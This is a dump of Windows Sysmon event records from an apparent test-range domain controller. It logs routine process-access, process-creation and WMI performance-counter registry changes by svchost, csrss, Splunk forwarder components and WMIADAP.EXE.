13:13:20.276{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004452Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:20.276{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004451Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:20.276{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004450Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:20.276{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4370-6000-F900-000000009A01}3968C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004449Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:20.276{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4370-6000-F900-000000009A01}3968C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004448Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:20.276{08A6967A-4370-6000-F900-000000009A01}3968C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004472Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:29.301{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4379-6000-FA00-000000009A01}2516\\?\C:\Windows\system32\wbem\WMIADAP.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004471Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:29.285{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004470Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:29.285{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004469Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:29.285{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004468Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:29.285{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004467Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:29.285{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004466Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:29.285{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004465Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:29.285{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004464Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:29.285{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004463Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:29.285{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004462Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:29.285{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4379-6000-FA00-000000009A01}2516\\?\C:\Windows\system32\wbem\WMIADAP.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004461Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:29.285{08A6967A-4288-6000-1000-000000009A01}11361996C:\Windows\system32\svchost.exe{08A6967A-4379-6000-FA00-000000009A01}2516\\?\C:\Windows\system32\wbem\WMIADAP.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\wbem\wmisvc.dll+2624|c:\windows\system32\wbem\wmisvc.dll+2491|C:\Windows\SYSTEM32\ntdll.dll+7d87d|C:\Windows\SYSTEM32\ntdll.dll+3a979|C:\Windows\SYSTEM32\ntdll.dll+1e86f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 12241200x80000000000000004491Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localSuspicious,ImageBeginWithBackslashDeleteValue2021-01-14 13:13:40.170{08A6967A-4379-6000-FA00-000000009A01}2516\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Updating 13241300x80000000000000004490Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-14 13:13:40.170{08A6967A-4379-6000-FA00-000000009A01}2516\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\Object List25380 25386 25396 25406 25426 25470 25480 25518 25524 25540 13241300x80000000000000004489Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-14 13:13:40.170{08A6967A-4379-6000-FA00-000000009A01}2516\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\First HelpDWORD (0x00006325) 13241300x80000000000000004488Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-14 13:13:40.170{08A6967A-4379-6000-FA00-000000009A01}2516\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\First CounterDWORD (0x00006324) 13241300x80000000000000004487Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-14 13:13:40.170{08A6967A-4379-6000-FA00-000000009A01}2516\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\Last HelpDWORD (0x000063cb) 13241300x80000000000000004486Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-14 13:13:40.170{08A6967A-4379-6000-FA00-000000009A01}2516\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\Last CounterDWORD (0x000063ca) 13241300x80000000000000004485Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-14 13:13:40.170{08A6967A-4379-6000-FA00-000000009A01}2516\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Last HelpDWORD (0x000063cb) 13241300x80000000000000004484Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-14 13:13:40.170{08A6967A-4379-6000-FA00-000000009A01}2516\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Last CounterDWORD (0x000063ca) 13241300x80000000000000004483Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-14 13:13:40.092{08A6967A-4379-6000-FA00-000000009A01}2516\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\UpdatingWmiApRpl 13241300x80000000000000004482Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-14 13:13:40.092{08A6967A-4379-6000-FA00-000000009A01}2516\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\PerfIniFileWmiApRpl.ini 12241200x80000000000000004481Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localSuspicious,ImageBeginWithBackslashDeleteValue2021-01-14 13:13:40.092{08A6967A-4379-6000-FA00-000000009A01}2516\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Updating 12241200x80000000000000004480Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localSuspicious,ImageBeginWithBackslashDeleteValue2021-01-14 13:13:40.092{08A6967A-4379-6000-FA00-000000009A01}2516\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\Object List 12241200x80000000000000004479Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localSuspicious,ImageBeginWithBackslashDeleteValue2021-01-14 13:13:40.092{08A6967A-4379-6000-FA00-000000009A01}2516\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\Last Help 12241200x80000000000000004478Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localSuspicious,ImageBeginWithBackslashDeleteValue2021-01-14 13:13:40.092{08A6967A-4379-6000-FA00-000000009A01}2516\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\First Help 12241200x80000000000000004477Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localSuspicious,ImageBeginWithBackslashDeleteValue2021-01-14 13:13:40.092{08A6967A-4379-6000-FA00-000000009A01}2516\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\Last Counter 12241200x80000000000000004476Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localSuspicious,ImageBeginWithBackslashDeleteValue2021-01-14 13:13:40.092{08A6967A-4379-6000-FA00-000000009A01}2516\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\First Counter 13241300x80000000000000004475Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-14 13:13:40.092{08A6967A-4379-6000-FA00-000000009A01}2516\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Last HelpDWORD (0x00006323) 13241300x80000000000000004474Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-14 13:13:40.092{08A6967A-4379-6000-FA00-000000009A01}2516\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Last CounterDWORD (0x00006322) 13241300x80000000000000004473Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-14 13:13:40.076{08A6967A-4379-6000-FA00-000000009A01}2516\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\UpdatingWmiApRpl 13241300x80000000000000004504Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-14 13:13:43.314{08A6967A-4379-6000-FA00-000000009A01}2516\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance\Performance RefreshedDWORD (0x00000001) 13241300x80000000000000004503Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-14 13:13:43.314{08A6967A-4379-6000-FA00-000000009A01}2516\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance\Performance RefreshDWORD (0x00000000) 13241300x80000000000000004502Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-14 13:13:43.314{08A6967A-4379-6000-FA00-000000009A01}2516\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\xeniface.sys[XENIFACEMOF]LowDateTime:1504655616,HighDateTime:30789954***Binary mof compiled successfully 13241300x80000000000000004501Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-14 13:13:43.314{08A6967A-4379-6000-FA00-000000009A01}2516\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\en-US\intelppm.sys.mui[PROCESSORWMI]LowDateTime:-592701735,HighDateTime:30543079***Binary mof compiled successfully 13241300x80000000000000004500Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-14 13:13:43.314{08A6967A-4379-6000-FA00-000000009A01}2516\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\intelppm.sys[PROCESSORWMI]LowDateTime:-2024749675,HighDateTime:30736945***Binary mof compiled successfully 13241300x80000000000000004499Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-14 13:13:43.314{08A6967A-4379-6000-FA00-000000009A01}2516\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\en-US\mssmbios.sys.mui[MofResource]LowDateTime:-592857982,HighDateTime:30543079***Binary mof compiled successfully 13241300x80000000000000004498Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-14 13:13:43.314{08A6967A-4379-6000-FA00-000000009A01}2516\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\mssmbios.sys[MofResource]LowDateTime:2077700573,HighDateTime:30531428***Binary mof compiled successfully 